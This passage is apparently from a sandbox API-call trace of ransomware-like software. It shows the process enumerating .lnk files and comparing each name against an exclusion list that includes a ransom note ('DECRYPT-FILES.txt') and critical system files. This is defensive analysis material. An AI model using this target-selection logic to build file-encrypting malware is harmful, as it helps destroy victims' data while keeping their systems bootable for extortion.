(lpString1="1ek gB-.lnk", lpString2="ntuser.dat.log") returned -1 [0182.190] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="thumbs.db") returned -1 [0182.190] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="Bootfont.bin") returned -1 [0182.190] lstrlenW (lpString="1ek gB-.lnk") returned 11 [0182.190] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.190] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aaa5f90, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aaa5f90, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aaa5f90, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfde, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fBhJo H3cVvF6LlYw8C.lnk", cAlternateFileName="1FBHJO~1.LNK")) returned 1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="autorun.inf") returned -1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="boot.ini") returned -1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="desktop.ini") returned -1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="ntuser.dat") returned -1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="iconcache.db") returned -1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="bootsect.bak") returned -1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="ntuser.dat.log") returned -1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="thumbs.db") returned -1 [0182.190] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="Bootfont.bin") returned -1 [0182.190] lstrlenW (lpString="1fBhJo H3cVvF6LlYw8C.lnk") returned 24 [0182.190] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.190] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa0da10, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aa0da10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aa0da10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0x0, dwReserved1=0x0, cFileName="1v9OFDiJWPm8MHHQ.lnk", cAlternateFileName="1V9OFD~1.LNK")) returned 1 [0182.190] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.190] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="autorun.inf") returned -1 [0182.190] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="boot.ini") returned -1 [0182.191] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="desktop.ini") returned -1 [0182.191] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="ntuser.dat") returned -1 [0182.191] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="iconcache.db") returned -1 [0182.191] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="bootsect.bak") returned -1 [0182.191] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="ntuser.dat.log") returned -1 [0182.191] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="thumbs.db") returned -1 [0182.191] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="Bootfont.bin") returned -1 [0182.191] lstrlenW (lpString="1v9OFDiJWPm8MHHQ.lnk") returned 20 [0182.191] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.191] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2c36b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a2c36b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a2c36b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="3fm.lnk", cAlternateFileName="")) returned 1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="autorun.inf") returned -1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="boot.ini") returned -1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="desktop.ini") returned -1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="ntuser.dat") returned -1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="iconcache.db") returned -1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="bootsect.bak") returned -1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="ntuser.dat.log") returned -1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="thumbs.db") returned -1 [0182.191] lstrcmpiW (lpString1="3fm.lnk", lpString2="Bootfont.bin") returned -1 [0182.191] lstrlenW (lpString="3fm.lnk") returned 7 [0182.191] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.191] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b099690, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b099690, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b099690, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="52sYE55ED9y1bqufgLex.lnk", cAlternateFileName="52SYE5~1.LNK")) returned 1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="autorun.inf") returned -1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="boot.ini") returned -1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="desktop.ini") returned -1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="ntuser.dat") returned -1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="iconcache.db") returned -1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="bootsect.bak") returned -1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="ntuser.dat.log") returned -1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="thumbs.db") returned -1 [0182.191] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="Bootfont.bin") returned -1 [0182.191] lstrlenW (lpString="52sYE55ED9y1bqufgLex.lnk") returned 24 [0182.191] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.191] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab8a7d0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ab8a7d0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ab8a7d0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x415, dwReserved0=0x0, dwReserved1=0x0, cFileName="5hXhWeztPrf9ZQC1Z.lnk", cAlternateFileName="5HXHWE~1.LNK")) returned 1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="autorun.inf") returned -1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="boot.ini") returned -1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="desktop.ini") returned -1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="ntuser.dat") returned -1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="iconcache.db") returned -1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="bootsect.bak") returned -1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="ntuser.dat.log") returned -1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="thumbs.db") returned -1 [0182.192] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="Bootfont.bin") returned -1 [0182.192] lstrlenW (lpString="5hXhWeztPrf9ZQC1Z.lnk") returned 21 [0182.192] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.192] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a54ae10, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a54ae10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a54ae10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x156a, dwReserved0=0x0, dwReserved1=0x0, cFileName="5jCFbrHSiWDWqLk.lnk", cAlternateFileName="5JCFBR~1.LNK")) returned 1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="autorun.inf") returned -1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="boot.ini") returned -1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="desktop.ini") returned -1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="ntuser.dat") returned -1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="iconcache.db") returned -1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="bootsect.bak") returned -1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="ntuser.dat.log") returned -1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="thumbs.db") returned -1 [0182.192] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="Bootfont.bin") returned -1 [0182.192] lstrlenW (lpString="5jCFbrHSiWDWqLk.lnk") returned 19 [0182.192] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.192] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b131c10, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b131c10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b131c10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x135f, dwReserved0=0x0, dwReserved1=0x0, cFileName="5xeQDqiQHYKki.lnk", cAlternateFileName="5XEQDQ~1.LNK")) returned 1 [0182.192] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.192] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="autorun.inf") returned -1 [0182.192] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="boot.ini") returned -1 [0182.192] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="desktop.ini") returned -1 [0182.192] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="ntuser.dat") returned -1 [0182.192] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="iconcache.db") returned -1 [0182.192] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="bootsect.bak") returned -1 [0182.192] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="ntuser.dat.log") returned -1 [0182.192] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="thumbs.db") returned -1 [0182.193] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="Bootfont.bin") returned -1 [0182.193] lstrlenW (lpString="5xeQDqiQHYKki.lnk") returned 17 [0182.193] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.193] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8993deb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8993deb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8993deb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="5zUARQ_fQofL.lnk", cAlternateFileName="5ZUARQ~1.LNK")) returned 1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="autorun.inf") returned -1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="boot.ini") returned -1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="desktop.ini") returned -1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="ntuser.dat") returned -1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="iconcache.db") returned -1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="bootsect.bak") returned -1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="ntuser.dat.log") returned -1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="thumbs.db") returned -1 [0182.193] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="Bootfont.bin") returned -1 [0182.193] lstrlenW (lpString="5zUARQ_fQofL.lnk") returned 16 [0182.193] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.193] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a30f970, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a30f970, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a30f970, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf31, dwReserved0=0x0, dwReserved1=0x0, cFileName="60wQ6b0LwaRhMx.flv.lnk", cAlternateFileName="60WQ6B~1.LNK")) returned 1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="autorun.inf") returned -1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="boot.ini") returned -1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="desktop.ini") returned -1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="ntuser.dat") returned -1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="iconcache.db") returned -1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="bootsect.bak") returned -1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="thumbs.db") returned -1 [0182.193] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="Bootfont.bin") returned -1 [0182.193] lstrlenW (lpString="60wQ6b0LwaRhMx.flv.lnk") returned 22 [0182.193] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.193] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89db47f0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b131c10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b131c10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x0, dwReserved1=0x0, cFileName="6FQU.lnk", cAlternateFileName="")) returned 1 [0182.193] lstrcmpiW (lpString1="6FQU.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.193] lstrcmpiW (lpString1="6FQU.lnk", lpString2="autorun.inf") returned -1 [0182.193] lstrcmpiW (lpString1="6FQU.lnk", lpString2="boot.ini") returned -1 [0182.193] lstrcmpiW (lpString1="6FQU.lnk", lpString2="desktop.ini") returned -1 [0182.193] lstrcmpiW (lpString1="6FQU.lnk", lpString2="ntuser.dat") returned -1 [0182.194] lstrcmpiW (lpString1="6FQU.lnk", lpString2="iconcache.db") returned -1 [0182.194] lstrcmpiW (lpString1="6FQU.lnk", lpString2="bootsect.bak") returned -1 [0182.194] lstrcmpiW (lpString1="6FQU.lnk", lpString2="ntuser.dat.log") returned -1 [0182.194] lstrcmpiW (lpString1="6FQU.lnk", lpString2="thumbs.db") returned -1 [0182.194] lstrcmpiW (lpString1="6FQU.lnk", lpString2="Bootfont.bin") returned -1 [0182.194] lstrlenW (lpString="6FQU.lnk") returned 8 [0182.194] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.194] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a890c50, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a890c50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a890c50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xef7, dwReserved0=0x0, dwReserved1=0x0, cFileName="6pqbaFAB59 bjsw9TrUE.lnk", cAlternateFileName="6PQBAF~1.LNK")) returned 1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="autorun.inf") returned -1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="boot.ini") returned -1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="desktop.ini") returned -1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="ntuser.dat") returned -1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="iconcache.db") returned -1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="bootsect.bak") returned -1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="ntuser.dat.log") returned -1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="thumbs.db") returned -1 [0182.194] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="Bootfont.bin") returned -1 [0182.194] lstrlenW (lpString="6pqbaFAB59 bjsw9TrUE.lnk") returned 24 [0182.194] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.194] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aaf2250, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aaf2250, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aaf2250, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfbf, dwReserved0=0x0, dwReserved1=0x0, cFileName="7xwnnge1dMI4u1n8p.lnk", cAlternateFileName="7XWNNG~1.LNK")) returned 1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="autorun.inf") returned -1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="boot.ini") returned -1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="desktop.ini") returned -1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="ntuser.dat") returned -1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="iconcache.db") returned -1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="bootsect.bak") returned -1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="ntuser.dat.log") returned -1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="thumbs.db") returned -1 [0182.194] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="Bootfont.bin") returned -1 [0182.194] lstrlenW (lpString="7xwnnge1dMI4u1n8p.lnk") returned 21 [0182.194] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.194] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b027270, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b027270, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b027270, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="7zLH.lnk", cAlternateFileName="")) returned 1 [0182.194] lstrcmpiW (lpString1="7zLH.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.195] lstrcmpiW (lpString1="7zLH.lnk", lpString2="autorun.inf") returned -1 [0182.195] lstrcmpiW (lpString1="7zLH.lnk", lpString2="boot.ini") returned -1 [0182.195] lstrcmpiW (lpString1="7zLH.lnk", lpString2="desktop.ini") returned -1 [0182.195] lstrcmpiW (lpString1="7zLH.lnk", lpString2="ntuser.dat") returned -1 [0182.195] lstrcmpiW (lpString1="7zLH.lnk", lpString2="iconcache.db") returned -1 [0182.195] lstrcmpiW (lpString1="7zLH.lnk", lpString2="bootsect.bak") returned -1 [0182.195] lstrcmpiW (lpString1="7zLH.lnk", lpString2="ntuser.dat.log") returned -1 [0182.195] lstrcmpiW (lpString1="7zLH.lnk", lpString2="thumbs.db") returned -1 [0182.195] lstrcmpiW (lpString1="7zLH.lnk", lpString2="Bootfont.bin") returned -1 [0182.195] lstrlenW (lpString="7zLH.lnk") returned 8 [0182.195] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.195] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a0ae370, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a0ae370, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a0ae370, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="8XdinFYWI5XC.mkv.lnk", cAlternateFileName="8XDINF~1.LNK")) returned 1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="autorun.inf") returned -1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="boot.ini") returned -1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="desktop.ini") returned -1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="ntuser.dat") returned -1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="iconcache.db") returned -1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="bootsect.bak") returned -1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="ntuser.dat.log") returned -1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="thumbs.db") returned -1 [0182.195] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="Bootfont.bin") returned -1 [0182.195] lstrlenW (lpString="8XdinFYWI5XC.mkv.lnk") returned 20 [0182.195] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.195] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ae11f30, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ae11f30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ae11f30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1b12, dwReserved0=0x0, dwReserved1=0x0, cFileName="8x_O2ZZ-dI_F.lnk", cAlternateFileName="8X_O2Z~1.LNK")) returned 1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="autorun.inf") returned -1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="boot.ini") returned -1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="desktop.ini") returned -1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="ntuser.dat") returned -1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="iconcache.db") returned -1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="bootsect.bak") returned -1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="ntuser.dat.log") returned -1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="thumbs.db") returned -1 [0182.195] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="Bootfont.bin") returned -1 [0182.195] lstrlenW (lpString="8x_O2ZZ-dI_F.lnk") returned 16 [0182.196] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.196] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac6f010, 